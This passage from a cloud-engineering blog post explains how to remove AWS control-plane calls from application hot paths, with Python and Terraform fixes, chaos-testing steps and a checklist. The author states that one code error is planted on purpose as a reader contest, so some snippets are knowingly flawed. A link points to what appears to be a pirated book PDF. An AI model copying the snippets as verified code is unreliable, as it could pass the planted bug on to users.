  dns_config {
    namespace_id = aws_service_discovery_private_dns_namespace.internal.id
    dns_records {
      ttl  = 10
      type = &#8220;A&#8221;
    }
  }
}

resource &#8220;aws_ecs_service&#8221; &#8220;backend&#8221; {
  name    = &#8220;backend-api&#8221;
  cluster = aws_ecs_cluster.main.id
  
  service_registries {
    registry_arn = aws_service_discovery_service.backend_api.arn
  }
}
</code></code></pre><p><strong>Alternative:</strong> If you must use ECS APIs, cache discovered endpoints for 5+ minutes and implement graceful degradation with stale lists.</p><h4>4. Lambda Functions Calling CloudFormation</h4><h5><strong>The Problem:</strong></h5><p>Lambdas query CloudFormation at runtime to discover resource endpoints. This one is surprisingly common, especially in organizations with complex Infrastructure-as-Code (IaC) and Serverless architectures.</p><pre><code><code># DANGEROUS: Lambda querying infrastructure state at runtime
def lambda_handler(event, context):
    cfn = boto3.client(&#8217;cloudformation&#8217;)
    stack = cfn.describe_stacks(StackName=&#8217;my-app-stack&#8217;)
    db_ep = next(o[&#8217;OutputValue&#8217;] for o in stack[&#8217;Stacks&#8217;][0][&#8217;Outputs&#8217;]
                      if o[&#8217;OutputKey&#8217;] == &#8216;DatabaseEndpoint&#8217;)
    
    db = connect(db_ep)
    return db.query()
</code></code></pre><h5><strong>The Fix:</strong></h5><p>Pass configuration via environment variables set at deploy time. CloudFormation evaluates outputs once during deployment.</p><pre><code><code># FIXED: Use environment variables
import os

def lambda_handler(event, context):
    # Read from environment, no API call
    db_endpoint = os.environ[&#8217;DATABASE_ENDPOINT&#8217;]
    db = connect(db_endpoint)
    return db.query()
</code></code></pre><p><strong>CloudFormation/Terraform setup:</strong></p><pre><code><code># CloudFormation
Resources:
  MyFunction:
    Type: AWS::Lambda::Function
    Properties:
      Environment:
        Variables:
          DATABASE_ENDPOINT: !GetAtt Database.Endpoint
</code></code></pre><pre><code><code># Terraform
resource &#8220;aws_lambda_function&#8221; &#8220;api&#8221; {
  function_name = &#8220;api-handler&#8221;
  
  environment {
    variables = {
      DATABASE_ENDPOINT = aws_db_instance.main.endpoint
    }
  }
}
</code></code></pre><p>(Say what? You&#8217;re using Pulumi?)</p><h4>5. DynamoDB Global Tables Metadata Queries</h4><h5><strong>The Problem:</strong></h5><p>Applications check Global Table replication health via <code>DescribeTable</code> before writes. This requires cross-region control plane coordination.</p><pre><code><code># DANGEROUS: Checking replication status before writes
def safe_global_write(item):
    table = dynamodb.describe_table(TableName=&#8217;GlobalTable&#8217;)
    
    # Check if all regions are healthy
    for replica in table[&#8217;Table&#8217;][&#8217;Replicas&#8217;]:
        if replica[&#8217;ReplicaStatus&#8217;] != &#8216;ACTIVE&#8217;:
            raise Exception(&#8221;Global table not ready&#8221;)
    
    dynamodb.put_item(TableName=&#8217;GlobalTable&#8217;, Item=item)
</code></code></pre><h5><strong>The Fix:</strong></h5><p>Just write to the table. DynamoDB&#8217;s data plane handles replication and returns errors if there&#8217;s a problem! Trust the data plane. </p><pre><code><code># FIXED: Write directly, let data plane handle errors
def safe_global_write(item):
    try:
        dynamodb.put_item(TableName=&#8217;GlobalTable&#8217;, Item=item)
    except ClientError as e:
        # Data plane will tell you if there&#8217;s a problem
        if e.response[&#8217;Error&#8217;][&#8217;Code&#8217;] == &#8216;ProvisionedThroughputExceededException&#8217;:
            # Handle throttling
            pass
        raise
</code></code></pre><p><strong>Key principle:</strong> <em>Don&#8217;t query metadata to verify health. Let data plane operations fail and handle those failures gracefully.</em></p><h4>6. Auto Scaling Based on Application Metrics</h4><h5><strong>The Problem:</strong></h5><p>Applications directly call Auto Scaling APIs to scale infrastructure.</p><pre><code><code># DANGEROUS: Application directly calling Auto Scaling APIs
def check_and_scale():
    queue_depth = sqs.get_queue_attributes(
        QueueUrl=&#8217;my-queue&#8217;,
        AttributeNames=[&#8217;ApproximateNumberOfMessages&#8217;]
    )
    
    if int(queue_depth[&#8217;Attributes&#8217;][&#8217;ApproximateNumberOfMessages&#8217;]) &gt; 1000:
        asg.set_desired_capacity(
            AutoScalingGroupName=&#8217;workers&#8217;,
            DesiredCapacity=20
        )
</code></code></pre><h5><strong>The Fix:</strong></h5><p>Publish custom metrics to CloudWatch (which queues locally), configure CloudWatch alarms with target tracking. AWS handles scaling asynchronously.</p><pre><code><code># FIXED: Publish metrics, let CloudWatch handle scaling
def publish_queue_depth():
    queue_depth = sqs.get_queue_attributes(
        QueueUrl=&#8217;my-queue&#8217;,
        AttributeNames=[&#8217;ApproximateNumberOfMessages&#8217;]
    )
    
    # CloudWatch buffers metrics locally if API unavailable
    cloudwatch.put_metric_data(
        Namespace=&#8217;MyApp&#8217;,
        MetricData=[{
            &#8216;MetricName&#8217;: &#8216;QueueDepth&#8217;,
            &#8216;Value&#8217;: int(queue_depth[&#8217;Attributes&#8217;][&#8217;ApproximateNumberOfMessages&#8217;]),
            &#8216;Unit&#8217;: &#8216;Count&#8217;
        }]
    )

# Background thread publishes metrics every minute
# Your app NEVER calls Auto Scaling APIs directly
</code></code></pre><p><strong>CloudWatch Alarm setup:</strong></p><pre><code><code>resource &#8220;aws_cloudwatch_metric_alarm&#8221; &#8220;scale_up&#8221; {
  alarm_name          = &#8220;queue-depth-high&#8221;
  comparison_operator = &#8220;GreaterThanThreshold&#8221;
  evaluation_periods  = &#8220;2&#8221;
  metric_name         = &#8220;QueueDepth&#8221;
  namespace           = &#8220;MyApp&#8221;
  period              = &#8220;60&#8221;
  statistic           = &#8220;Average&#8221;
  threshold           = &#8220;1000&#8221;
  
  alarm_actions = [aws_autoscaling_policy.scale_up.arn]
}
</code></code></pre><h4>7. CloudWatch Logs CreateLogStream in Request Path</h4><h5><strong>The Problem:</strong></h5><p>Applications create log streams synchronously during request handling. <code>CreateLogStream</code> is a control plane operation.</p><pre><code><code># DANGEROUS: Creating log streams synchronously
def log_request(request_id, data):
    try:
        logs.create_log_stream(
            logGroupName=&#8217;/aws/app/requests&#8217;,
            logStreamName=request_id
        )
    except logs.exceptions.ResourceAlreadyExistsException:
        pass
    
    logs.put_log_events(
        logGroupName=&#8217;/aws/app/requests&#8217;,
        logStreamName=request_id,
        logEvents=[{&#8217;timestamp&#8217;: int(time.time() * 1000), &#8216;message&#8217;: data}]
    )
</code></code></pre><h5><strong>The Fix:</strong></h5><p>Write structured logs to stdout/stderr. Configure CloudWatch Agent or Fluent Bit as a sidecar to ship logs asynchronously.</p><pre><code><code># FIXED: Write to stdout, let agent handle shipping
import json
import sys

def log_request(request_id, data):
    # Write structured JSON to stdout
    log_entry = {
        &#8216;timestamp&#8217;: time.time(),
        &#8216;request_id&#8217;: request_id,
        &#8216;data&#8217;: data
    }
    print(json.dumps(log_entry), file=sys.stdout)
</code></code></pre><p><strong>CloudWatch Agent config:</strong></p><pre><code><code>{
  &#8220;logs&#8221;: {
    &#8220;logs_collected&#8221;: {
      &#8220;files&#8221;: {
        &#8220;collect_list&#8221;: [{
          &#8220;file_path&#8221;: &#8220;/var/log/app/stdout.log&#8221;,
          &#8220;log_group_name&#8221;: &#8220;/aws/app/requests&#8221;,
          &#8220;log_stream_name&#8221;: &#8220;{instance_id}&#8221;
        }]
      }
    }
  }
}
</code></code></pre><p>If control plane is down, logs buffer locally. Your application keeps serving requests.</p><h4>8. KMS DescribeKey in Encryption Hot Path</h4><h5><strong>The Problem:</strong></h5><p>Checking key metadata before every encryption operation. <code>DescribeKey</code> is control plane, <code>Encrypt</code> is data plane.</p><pre><code><code># DANGEROUS: Checking key metadata before every encryption
def encrypt_data(plaintext):
    key_metadata = kms.describe_key(KeyId=&#8217;alias/my-key&#8217;)
    if key_metadata[&#8217;KeyMetadata&#8217;][&#8217;KeyState&#8217;] != &#8216;Enabled&#8217;:
        raise Exception(&#8221;Key not available&#8221;)
    
    return kms.encrypt(KeyId=&#8217;alias/my-key&#8217;, Plaintext=plaintext)
</code></code></pre><h5><strong>The Fix:</strong></h5><p>Call <code>Encrypt</code> directly. The data plane will tell you if the key is unavailable.</p><pre><code><code># FIXED: Call encrypt directly
def encrypt_data(plaintext):
    try:
        return kms.encrypt(KeyId=&#8217;alias/my-key&#8217;, Plaintext=plaintext)
    except ClientError as e:
        if e.response[&#8217;Error&#8217;][&#8217;Code&#8217;] == &#8216;DisabledException&#8217;:
            logger.error(&#8221;KMS key is disabled&#8221;)
        raise
</code></code></pre><p><strong>Key principle:</strong> Don&#8217;t preemptively check status. Let data plane operations fail and handle errors gracefully.</p><h4>9. EC2 DescribeInstances for Health Checks</h4><h5><strong>The Problem:</strong></h5><p>Applications query EC2 API to verify their own instance health.</p><pre><code><code># DANGEROUS: Application checking if its own instances are healthy
def health_check():
    my_instance_id = requests.get(&#8217;http://169.254.169.254/latest/meta-data/instance-id&#8217;).text
    instance = ec2.describe_instances(InstanceIds=[my_instance_id])
    
    state = instance[&#8217;Reservations&#8217;][0][&#8217;Instances&#8217;][0][&#8217;State&#8217;][&#8217;Name&#8217;]
    return state == &#8216;running&#8217;
</code></code></pre><h5><strong>The Fix:</strong></h5><p>Health checks should verify application health, not infrastructure state. If your code is executing, your instance is running.</p><pre><code><code># FIXED: Check application health, not infrastructure state
def health_check():
    # Verify you can reach your dependencies
    try:
        # Check database connection
        db.execute(&#8217;SELECT 1&#8217;)
        
        # Check cache
        redis.ping()
        
        # Check you can process a request
        result = process_sample_request()
        
        return {&#8217;status&#8217;: &#8216;healthy&#8217;}
    except Exception as e:
        return {&#8217;status&#8217;: &#8216;unhealthy&#8217;, &#8216;error&#8217;: str(e)}
</code></code></pre><p>Your load balancer detects unhealthy instances when they stop responding. You don&#8217;t need to ask AWS if your instance exists&#8212;if your code is running, it exists.</p><h2>How to Test This: Chaos Engineering</h2><p>You need to verify your fixes work before the next real outage. Here&#8217;s how to simulate a us-east-1 control plane failure.</p><h4>Network-Level Blocking (Most Realistic)</h4><p>Block all us-east-1 control plane endpoints at the network level:</p><pre><code><code># Block us-east-1 control plane
sudo iptables -A OUTPUT -d *.us-east-1.amazonaws.com -j DROP

# Or be more surgical - block specific services
sudo iptables -A OUTPUT -d sts.us-east-1.amazonaws.com -j DROP
sudo iptables -A OUTPUT -d sts.amazonaws.com -j DROP
sudo iptables -A OUTPUT -d dynamodb.us-east-1.amazonaws.com -p tcp --dport 443 -j DROP
</code></code></pre><h4>AWS Fault Injection Simulator (Managed Chaos)</h4><pre><code><code># Create an experiment that blocks STS
aws fis create-experiment-template \
  --cli-input-json &#8216;{
    &#8220;description&#8221;: &#8220;Block STS control plane&#8221;,
    &#8220;actions&#8221;: {
      &#8220;blockSTS&#8221;: {
        &#8220;actionId&#8221;: &#8220;aws:network:disrupt-connectivity&#8221;,
        &#8220;parameters&#8221;: {
          &#8220;scope&#8221;: &#8220;all&#8221;,
          &#8220;duration&#8221;: &#8220;PT12H&#8221;
        },
        &#8220;targets&#8221;: {
          &#8220;Subnets&#8221;: &#8220;mySubnets&#8221;
        }
      }
    },
    &#8220;stopConditions&#8221;: [{
      &#8220;source&#8221;: &#8220;none&#8221;
    }],
    &#8220;roleArn&#8221;: &#8220;arn:aws:iam::123456789:role/FISRole&#8221;,
    &#8220;targets&#8221;: {
      &#8220;mySubnets&#8221;: {
        &#8220;resourceType&#8221;: &#8220;aws:ec2:subnet&#8221;,
        &#8220;selectionMode&#8221;: &#8220;ALL&#8221;
      }
    }
  }&#8217;
</code></code></pre><h3>The Chaos Drill Protocol</h3><p>Run this quarterly: (or annually if you&#8217;re strapped or scrappy.)</p><pre><code><code>Hour 0:00 - Block all *.us-east-1.amazonaws.com at firewall
Hour 0:05 - Verify monitoring detects degraded control plane
Hour 0:15 - Confirm all services still serving requests
Hour 1:00 - Run load tests, verify throughput unchanged
Hour 2:00 - Attempt deployment (should fail gracefully)
Hour 4:00 - Check error logs for control plane call attempts
Hour 8:00 - Verify services still healthy
Hour 12:00 - Restore us-east-1 connectivity
Hour 12:15 - Verify graceful recovery
Hour 24:00 - Post-mortem: what broke?
</code></code></pre><p><strong>Target KPIs:</strong></p><ul><li><p>Time to detection: &lt;5 minutes</p></li><li><p>Customer-facing request success rate: &gt;99.9%</p></li><li><p>Revenue impact: $0</p></li><li><p>Data loss: 0 transactions</p></li><li><p>Services requiring manual intervention: 0</p></li></ul><p>If you don&#8217;t hit these KPIs, you found more dependencies. Fix them and test again. <br>Or send an email around if you prefer CYA to hard work. (j/k, please fix.) </p><h2>Preemptive Q&amp;A: Handling Pushback</h2><p>Your team will push back on these changes. Here&#8217;s how to win those arguments.</p><h5>Q: Why is caching configuration for an hour or more acceptable? We need fresh data.</h5><p><strong>A:</strong> We need availability more than we need perfect freshness. Our application will survive an outage by using slightly stale config rather than failing globally because it blocked on a control plane call. <a href="https://unidel.edu.ng/focelibrary/books/Designing%20Data-Intensive%20Applications%20The%20Big%20Ideas%20Behind%20Reliable,%20Scalable,%20and%20Maintainable%20Systems%20by%20Martin%20Kleppmann%20(z-lib.org).pdf">Stale while refresh</a>, while the refresh is taking a quick (or not so quick) coffee break. If a config change is critical enough to warrant a synchronous API call on every request, it should be baked into a new deployment, not fetched dynamically. Prioritize the data plane.</p><h5>Q: The Parameter Store API is rated for high throughput. Why is it on the list?</h5><p><strong>A:</strong> High throughput doesn&#8217;t equal control plane independence. The API endpoints rely on internal AWS dependencies (KMS metadata for decryption, DynamoDB for advanced tier storage). When those underlying control plane dependencies fail, the high-throughput API fails too. The only way to guarantee resilience is to make the dependency local to your host, which means aggressive caching.</p><h5>Q: Why can&#8217;t we just set a longer timeout and retry?</h5><p><strong>A:</strong> Timeouts and retries are useless against a prolonged control plane outage. You&#8217;re just burning compute cycles retrying an API call that&#8217;s guaranteed to fail for 6+ hours. The resilient solution is to remove the dependency entirely from the hot path by moving the operation to startup or an asynchronous thread. <em><strong>Retries are for transient data plane faults, not control plane collapse.</strong></em></p><h5>Q: Doesn&#8217;t the fix for EC2 health checks (removing DescribeInstances) risk missing real infrastructure failures?</h5><p><strong>A:</strong> No. If the instance fails, your process stops, and your load balancer health checks immediately detect the non-responsive port. You&#8217;re delegating infrastructure state management to the load balancer and Auto Scaling Group, which is exactly where it belongs. Your application&#8217;s job is only to confirm it can execute its business logic. The fix correctly eliminates the circular dependency on EC2 control plane.</p><h5>Q: Our security team says 12-hour credentials violate our security policy. Isn&#8217;t this less secure than 15-minute tokens?</h5><p><strong>A:</strong> It&#8217;s true that short TTLs are widely regarded as security best practice. They&#8217;re also widely used as a substitute for doing the harder work of building robust security monitoring and defense-in-depth controls. Short TTLs are easy to implement (change a config value) and easy to audit (check a compliance box). But they can become a crutch that delays investment in controls that actually limit blast radius.</p><p><strong>Industry standard security frameworks (NIST 800-53, CIS Controls, ISO 27001) prioritize:</strong></p><ol><li><p>Least privilege access controls</p></li><li><p>Continuous monitoring and anomaly detection</p></li><li><p>Network segmentation and isolation</p></li><li><p>Rapid incident response and revocation</p></li></ol><div class="pullquote"><p><em>Notice what&#8217;s not in the top tier? TTL length. <br>That&#8217;s an implementation detail, not a foundational control.</em></p></div><p>Short TTLs reduce the exposure window if credentials are compromised. That&#8217;s real. But TTL is an implementation detail, not a foundational security control. Industry standard security frameworks (NIST 800-53, CIS Controls, ISO 27001) prioritize least privilege access controls, continuous monitoring and anomaly detection, network segmentation, and rapid incident response; notice what&#8217;s not in the top tier? TTL length. What actually matters when credentials are compromised: Can you detect abnormal usage? What can those credentials access? Can the attacker move laterally? How fast can you revoke them? With robust monitoring and least-privilege policies, you detect and revoke compromised credentials in minutes, whether their TTL is 15 minutes or 12 hours. Without those controls, 15-minute credentials still leave you vulnerable. Companies with 15-minute TTLs and weak monitoring get breached. Companies with 12-hour TTLs and strong monitoring don&#8217;t. TTL is a parameter, your security posture is the system. Implement the foundational controls first, then set TTL based on operational requirements.</p><h5>Q: Our security team still won&#8217;t approve 12-hour credentials. What do we do?</h5><p><strong>A:</strong> Point them to Part 1&#8217;s <a href="/__u/ctolunchnyc.substack.com/i/177400881/roi-calculator">ROI calculator</a>. The alternative is accepting that your entire application fails within 15-60 minutes of a control plane outage, costing $X per hour in lost revenue. The security risk of longer-lived credentials is manageable (implement aggressive monitoring, automatic revocation on suspicious activity). The business risk of runtime control plane dependencies is existential. Make them choose between theoretical security risk and actual business risk. (Your CFO may need to referee.)</p><h2>Success Criteria: You&#8217;re Done When...</h2><p>Here&#8217;s your checklist. You&#8217;re not done until every item is checked:</p><p><strong>&#10003; Credential Management</strong></p><ul><li><p>[ ] All IAM roles set to 12-hour maximum session duration</p></li><li><p>[ ] All services load credentials at startup, never refresh at runtime</p></li><li><p>[ ] Chaos test passes: Services run 12+ hours with STS blocked</p></li></ul><p><strong>&#10003; Secrets &amp; Configuration</strong></p><ul><li><p>[ ] All secrets loaded at startup, cached for app lifetime</p></li><li><p>[ ] All Parameter Store reads moved to startup with 1+ hour cache TTL</p></li><li><p>[ ] Background refresh threads tolerate failures gracefully</p></li></ul><p><strong>&#10003; Service Discovery</strong></p><ul><li><p>[ ] DNS-based service discovery implemented (no DescribeTasks at runtime)</p></li><li><p>[ ] All service-to-service calls use DNS names, not IP lookups</p></li></ul><p><strong>&#10003; Infrastructure Queries</strong></p><ul><li><p>[ ] Zero CloudFormation queries in Lambda runtime (use environment variables)</p></li><li><p>[ ] Zero DescribeTable calls before DynamoDB operations</p></li><li><p>[ ] Zero DescribeInstances calls in health checks</p></li></ul><p><strong>&#10003; Scaling &amp; Monitoring</strong></p><ul><li><p>[ ] Applications publish metrics, never call Auto Scaling APIs directly</p></li><li><p>[ ] CloudWatch alarms configured for automated scaling</p></li><li><p>[ ] Logging uses stdout/stderr, no CreateLogStream at runtime</p></li></ul><p><strong>&#10003; Encryption</strong></p><ul><li><p>[ ] KMS Encrypt calls made directly, no DescribeKey checks</p></li></ul><p><strong>&#10003; Testing</strong></p><ul><li><p>[ ] Chaos drill completed: Block us-east-1 for 12 hours</p></li><li><p>[ ] All services continue serving requests</p></li><li><p>[ ] Monitoring confirms zero control plane calls during drill</p></li><li><p>[ ] Post-mortem documented any failures found</p></li></ul><p><strong>&#10003; Documentation</strong></p><ul><li><p>[ ] Runbook updated with control plane failure response</p></li><li><p>[ ] Team trained on new patterns</p></li><li><p>[ ] Automated alerts configured for control plane health</p></li></ul><h2>Sleep Well</h2><p>The companies that survived the October 20th outage had already eliminated these dependencies. The companies that didn&#8217;t spent 12 hours in war rooms explaining to customers why their beds wouldn&#8217;t flatten, why their payments wouldn&#8217;t process and why their water purifiers refused to dispense. And explaining to their boss why core services were down despite being &#8220;multi-region.&#8221;</p><p>You have the complete playbook now. Run the audit. Fix priority zero (the 60-minute death clock). Tackle the top 9 anti-patterns. Test it with chaos engineering. Document what you learned. The next us-east-1 outage is coming. Probably within the next 12 months, based on AWS&#8217;s track record. The only question is whether you&#8217;ll be one of the 3500+ companies scrambling in war rooms at 3AM, or one of the companies who got a good night&#8217;s sleep because nobody&#8217;s pager duty was going off. <br><br>Such sweet dreams.</p><div class="pullquote"><p><em>As is traditional, there is one code error in this post. <strong>First to spot it gets a free CTO Lunch.<br>(</strong>hint: polyglut) </em></p></div><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://ctolunchnyc.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Never lose another hour of sleep! Subscribe for free to receive new posts and support the work.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p></p>]]></content:encoded></item></channel></rss>